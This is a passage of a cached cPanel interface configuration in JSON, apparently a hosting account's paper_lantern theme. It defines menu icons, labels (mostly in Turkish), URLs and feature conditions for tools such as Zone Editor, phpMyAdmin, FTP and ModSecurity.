Koruması","type":"image","url":"mime/hotlink.html","imgtype":"icon"},"indexes":{"url":"indexmanager/index.html","imgtype":"icon","itemdesc":"İndeksler","group":"advanced","plainitemdesc":"Indexes","type":"image","if":"$HASROLE{'WebServer'}","feature":"indexmanager","onclick":"","subtype":"img","description":"İndeksler","base64_png_image":"","key":"indexes","target":"","height":"48","width":"48","searchtext":"İndeksler indeks yöneticisi","file":"indexes","acontent":"","itemorder":"4"},"address_importer":{"type":"image","plainitemdesc":"Address Importer","group":"email","itemdesc":"Adres Aktarıcısı","if":"$HASROLE{'MailReceive'}","imgtype":"icon","url":"mail/csvimport.html","file":"address_importer","searchtext":"Adres Aktarıcısı Adresleri Aktar İleticiler Posta csv aktar xls aktar","width":"48","acontent":"","itemorder":"12","base64_png_image":"","onclick":"","subtype":"img","feature":"csvimport","description":"Adres Aktarıcısı","height":"48","target":"","key":"address_importer"},"zone_editor":{"searchtext":"zone editor advanced simple caa cname a aaaa txt dkim dmarc spf mx srv record dns dnssec Zone Editor","file":"zone_editor","width":"48","itemorder":"6","acontent":"","base64_png_image":"","onclick":"","subtype":"img","description":"Zone Editor","feature":"simplezoneedit || changemx || zoneedit","target":"","height":"48","key":"zone_editor","type":"image","group":"domains","plainitemdesc":"Zone Editor","itemdesc":"Zone Editor","if":"$HASROLE{'DNS'}","imgtype":"icon","url":"zone_editor/index.html"},"ruby_gems":{"imgtype":"icon","url":"module_installers/index.html?lang=ruby","plainitemdesc":"RubyGems","group":"software","itemdesc":"RubyGems","type":"image","if":"$hasgem","description":"RubyGems","onclick":"","subtype":"img","feature":"modules-ruby","base64_png_image":"","key":"ruby_gems","height":"48","target":"","width":"48","searchtext":"RubyGems ror ruby gems rails","file":"ruby_gems","acontent":"","itemorder":"4"},"optimize_website":{"base64_png_image":"","onclick":"","description":"Web Sitesini Optimize Edin","subtype":"img","feature":"optimizews","height":"32","target":"","key":"optimize_website","file":"optimize_website","searchtext":"Web Sitesini Optimize Edin","width":"32","itemorder":"7","acontent":"","imgtype":"icon","url":"optimize/index.html","type":"image","itemdesc":"Web Sitesini Optimize Edin","group":"software","plainitemdesc":"Optimize Website","if":"$hasmoddeflate"},"site_publisher":{"url":"site_publisher/index.html","imgtype":"icon","if":"$HASROLE{'WebServer'}","type":"image","group":"domains","plainitemdesc":"Site Publisher","itemdesc":"Site Yayımlayıcısı","height":"48","target":"","key":"site_publisher","base64_png_image":"","subtype":"img","onclick":"","feature":"sitepublisher","description":"Site Yayımlayıcısı","acontent":"","itemorder":"1","width":"48","searchtext":"site yayımlayıcı oluşturucu web sitesi oluşturucusunu başlat şablon Site Yayımlayıcısı","file":"site_publisher"},"raw_access":{"type":"image","itemdesc":"Ham Erişim","plainitemdesc":"Raw Access","group":"metrics","if":"$HASROLE{'WebServer'}","url":"raw/index.html","imgtype":"icon","width":"48","searchtext":"Ham Erişim günlükler ham günlükler hamgünlükler","file":"raw_access","acontent":"","itemorder":"4","base64_png_image":"","onclick":"","subtype":"img","feature":"rawlog","description":"Ham Erişim","target":"","height":"48","key":"raw_access"},"group_files":{"base64_png_image":"","subtype":"img","onclick":"","description":"Dosyalar","height":"48","target":"","key":"group_files","grouporder":"2","file":"group_files","searchtext":"group_files","width":"48","acontent":"","groupdesc":"Dosyalar","imgtype":"icon","type":"image","group":"files","itemdesc":"group_files"},"directory_privacy":{"if":"$HASROLE{'WebServer'}","itemdesc":"Dizin Gizliliği","group":"files","plainitemdesc":"Directory Privacy","type":"image","imgtype":"icon","url":"htaccess/index.html","acontent":"","itemorder":"3","searchtext":"Dizin Gizliliği şifre korumalı şifre korumalı","file":"directory_privacy","width":"48","key":"directory_privacy","target":"","height":"48","onclick":"","description":"Dizin Gizliliği","subtype":"img","feature":"webprotect","base64_png_image":""},"web_host_manager":{"imgtype":"icon","url":"/xferwhm/","if":"$isreseller","group":"advanced","plainitemdesc":"[asis,WebHost Manager®]","itemdesc":"WebHost Manager®","type":"image","key":"web_host_manager","height":"48","target":"","onclick":"","description":"WebHost Manager®","subtype":"img","base64_png_image":"","itemorder":"1","acontent":"","searchtext":"WebHost Manage webhostmanager whm WebHost Manager®","file":"web_host_manager","width":"48"},"jetbackupsingle":{"acontent":"","itemorder":0,"searchtext":"JetBackup","file":"jetbackupsingle","width":"47","target":"","height":"47","onclick":"","subtype":"img","feature":"jetbackupsingle","description":"JetBackup","base64_png_image":"","plainitemdesc":"JetBackup","group":"files","itemdesc":"JetBackup","type":"image","imgtype":"icon","url":"jetbackup/index.html#!/"},"group_domains":{"group":"domains","itemdesc":"group_domains","type":"image","if":"$HASROLE{'WebServer'} || $HASROLE{'DNS'}","imgtype":"icon","grouporder":"4","searchtext":"group_domains","width":"4","file":"group_domains","acontent":"","groupdesc":"Etki Alanları","onclick":"","subtype":"img","description":"Etki Alanları","base64_png_image":"","key":"group_domains","height":"48","target":""},"group_soft_div":{"type":"image","itemdesc":"group_soft_div","group":"soft_div","imgtype":"icon","groupdesc":"Softaculous Apps Installer","acontent":"","width":"47","searchtext":"group_soft_div","file":"group_soft_div","grouporder":"10","height":"47","target":"","base64_png_image":"","subtype":"img","onclick":"","description":"Softaculous Apps Installer"},"mysql_manager":{"itemorder":1,"acontent":"","searchtext":"mysql manager database db MySQL® Manager","width":48,"file":"mysql_manager","target":"","height":48,"key":"mysql_manager","base64_png_image":"","subtype":"img","onclick":"","feature":"mysql_manager","description":"MySQL® Manager","if":"$experimental{'mysql_manager'}","type":"image","plainitemdesc":"MySQL® Manager","group":"databases","itemdesc":"MySQL® Manager","url":"mysql-manager/index.html","imgtype":"icon"},"anonymous_ftp":{"imgtype":"icon","url":"ftp/anonymous.html","touch":"ftp","type":"image","itemdesc":"Anonim FTP","group":"files","plainitemdesc":"Anonymous FTP","if":"$SERVICEPROVIDED{'ftp'} && $hasanonftp","base64_png_image":"","onclick":"","description":"Anonim FTP","subtype":"img","feature":"ftpaccts","height":"48","target":"","key":"anonymous_ftp","width":"48","searchtext":"Anonim FTP anonymousftp","file":"anonymous_ftp","acontent":"","itemorder":"8"},"postgresql_databases":{"type":"image","itemdesc":"PostgreSQL Veritabanları","plainitemdesc":"PostgreSQL Databases","group":"databases","if":"$SERVICEPROVIDED{'postgresql'} && $haspostgres","imgtype":"icon","url":"psql/index.html","searchtext":"PostgreSQL Databases postgres database postgresql db PostgreSQL Veritabanları","width":"48","file":"postgresql_databases","acontent":"","itemorder":"5","base64_png_image":"","onclick":"","feature":"postgres","subtype":"img","description":"PostgreSQL Veritabanları","height":"48","target":"","key":"postgresql_databases"},"archive":{"itemorder":"14","acontent":"","searchtext":"e-posta arşivi E-posta Arşivleme","width":"48","file":"archive","key":"archive","height":"48","target":"","subtype":"img","onclick":"","feature":"emailarchive","description":"Arşiv","base64_png_image":"","implements":"Email_Archive","if":"$HASROLE{'MailReceive'} && $CONFIF{'emailarchive'}","group":"email","plainitemdesc":"Archive","itemdesc":"Arşiv","type":"image","imgtype":"icon","url":"mail/archive.html"},"autoresponders":{"target":"","height":"48","key":"autoresponders","implements":"Email_AutoResponders","base64_png_image":"","feature":"autoresponders","onclick":"","subtype":"img","description":"Otomatik Yanıtlayıcılar","itemorder":"5","acontent":"","width":"48","searchtext":"Otomatik Yanıtlayıcılar otomatik yanıtlayıcı otomatik yanıtlayıcılar","file":"autoresponders","imgtype":"icon","url":"mail/autores.html","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'}","type":"image","itemdesc":"Otomatik Yanıtlayıcılar","plainitemdesc":"Autoresponders","group":"email"},"email_disk_usage":{"itemorder":"19","acontent":"","searchtext":"email accounts mail disk usage bytes mb size Email Disk Usage","width":"48","file":"email_disk_usage","height":"48","target":"","key":"email_disk_usage","implements":"Email_Disk_Usage","base64_png_image":"","onclick":"","subtype":"img","description":"Email Disk Usage","feature":"popaccts && email_disk_usage","if":"$HASROLE{'MailReceive'}","type":"image","plainitemdesc":"Email Disk Usage","group":"email","itemdesc":"Email Disk Usage","url":"mail/manage_disk_usage/","imgtype":"icon"},"domains":{"url":"domains/index.html","imagetype":"icon","type":"image","plainitemdesc":"Domains","group":"domains","itemdesc":"Etki Alanları","height":"48","target":"","key":"domains","base64_png_image":"","description":"Etki Alanları","onclick":"","subtype":"img","feature":"addondomains || subdomains || parkeddomains || sslinstall","acontent":"","itemorder":"2","searchtext":"domains addon subdomain parked create domain force https redirect Etki Alanları","file":"domains","width":"48"},"track_delivery":{"if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'}","type":"image","itemdesc":"Gönderimi İzle","plainitemdesc":"Track Delivery","group":"email","url":"mail/route.html","imgtype":"icon","acontent":"","itemorder":"8","width":"48","searchtext":"İletilen E-postayı İzle, E-postayı İzle, posta iletim raporu Gönderimi İzle","file":"track_delivery","target":"","height":"48","key":"track_delivery","implements":"Email_DeliveryReport","base64_png_image":"","onclick":"","feature":"emailtrace","description":"Gönderimi İzle","subtype":"img"},"php_pg_admin":{"group":"databases","plainitemdesc":"[asis,phpPgAdmin]","itemdesc":"phpPgAdmin","type":"image","if":"$SERVICEPROVIDED{'postgresql'} && $haspostgres","url":"/3rdparty/phpPgAdmin/index.php","imgtype":"icon","file":"php_pg_admin","searchtext":"phpPgAdmin database psql db","width":"48","itemorder":"7","acontent":"target=\"phppgadmin\"","description":"phpPgAdmin","onclick":"","subtype":"img","feature":"phppgadmin","base64_png_image":"","key":"php_pg_admin","height":"48","target":"phppgadmin"},"mime_types":{"if":"$HASROLE{'WebServer'}","type":"image","itemdesc":"MIME Türleri","group":"advanced","plainitemdesc":"MIME Types","url":"mime/mime.html","imgtype":"icon","acontent":"","itemorder":"7","width":"48","searchtext":"MIME Türleri mimetype türler","file":"mime_types","target":"","height":"48","key":"mime_types","base64_png_image":"","subtype":"img","onclick":"","feature":"mime","description":"MIME Türleri"},"tls_wizard":{"if":"$HASROLE{'UserSSL'} && $market_has_enabled_providers","type":"image","itemdesc":"SSL/TLS Sihirbazı","plainitemdesc":"[asis,SSL]/[asis,TLS] Wizard","group":"security","url":"security/tls_wizard/","imgtype":"icon","acontent":"","itemorder":"6","file":"tls_wizard","searchtext":"SSL/TLS Sihirbazı","width":"48","target":"","height":"48","key":"tls_wizard","implements":"SSL_TLS_Wizard","base64_png_image":"","onclick":"","feature":"market && tls_wizard && sslinstall","subtype":"img","description":"SSL/TLS Sihirbazı"},"remote_mysql":{"group":"databases","plainitemdesc":"Remote MySQL®","itemdesc":"Uzak MySQL®","type":"image","if":"$SERVICEPROVIDED{'mysql'}","imgtype":"icon","url":"sql/managehost.html","searchtext":"Remote MySQL db Uzak MySQL®","width":"48","file":"remote_mysql","acontent":"","itemorder":"4","description":"Uzak MySQL®","onclick":"","subtype":"img","feature":"mysql","base64_png_image":"","key":"remote_mysql","target":"","height":"48"},"php_my_admin":{"acontent":"target=\"phpmyadmin\"","itemorder":"1","file":"php_my_admin","searchtext":"phpMyAdmin database db","width":"48","target":"phpmyadmin","height":"48","key":"php_my_admin","implements":"Database_phpMyAdmin","base64_png_image":"","onclick":"","description":"phpMyAdmin","subtype":"img","feature":"phpmyadmin","if":"$SERVICEPROVIDED{'mysql'}","type":"image","itemdesc":"phpMyAdmin","group":"databases","plainitemdesc":"phpMyAdmin","imgtype":"icon","url":"sql/PhpMyAdmin.html"},"php":{"file":"php","searchtext":"PHP yapılandırması","width":"48","itemorder":"1","acontent":"","subtype":"img","onclick":"","description":"PHP","feature":"php-config","base64_png_image":"","key":"php","height":"48","target":"","itemdesc":"PHP","group":"software","plainitemdesc":"PHP","type":"image","if":"!$is_ea4","url":"php/index.html?lang","imgtype":"icon"},"ftp_accounts":{"searchtext":"FTP Hesapları ftp oluştur","width":"48","file":"ftp_accounts","itemorder":"6","acontent":"","subtype":"img","onclick":"","description":"FTP Hesapları","feature":"ftpaccts","base64_png_image":"","key":"ftp_accounts","target":"","height":"48","itemdesc":"FTP Hesapları","group":"files","plainitemdesc":"FTP Accounts","type":"image","touch":"ftp","if":"$SERVICEPROVIDED{'ftp'}","imgtype":"icon","url":"ftp/accounts.html"},"mod_security":{"type":"image","itemdesc":"ModSecurity","plainitemdesc":"ModSecurity","group":"security","if":"$HASROLE{'WebServer'} && $is_mod_security_installed","imgtype":"icon","url":"security/mod_security/index.html","searchtext":"ModSecurity mod güvenliği mod_security","width":"48","file":"mod_security","acontent":"","itemorder":"7","base64_png_image":"","onclick":"","subtype":"img","description":"ModSecurity","feature":"modsecurity","target":"","height":"48","key":"mod_security"}},"version":"5.0","dyalist":[{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui.conf"},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_lvephpsel.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_wp_softaculous.conf"},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupsingle.conf"},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_lvenodejssel.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupfilesbackups.conf"},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupgdpr.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupdnsbackups.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupdbbackups.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_mailscanner.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupcronbackups.conf"},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_lvepythonsel.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupsnapshots.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_lveresusage.conf"},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_ls_web_cache_manager.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupemailbackups.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_imunify360.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_group_jetbackup.conf"},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_group_soft_div.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupsettings.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_cpanel-site-monitor.conf"},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupqueue.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_lvewpos.conf"},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_imunify-antivirus.conf","allow_legacy":1},{"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_jetbackupfullbackups.conf","allow_legacy":1},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_soft_div_icons.conf"},{"allow_legacy":1,"file":"/usr/local/cpanel/base/frontend/paper_lantern//dynamicui/dynamicui_lverubysel.conf"},{"file":"/home/juventu2/cpanelbranding/paper_lantern/dynamicui.conf","allow_legacy":1}],"cachetime":1731134623}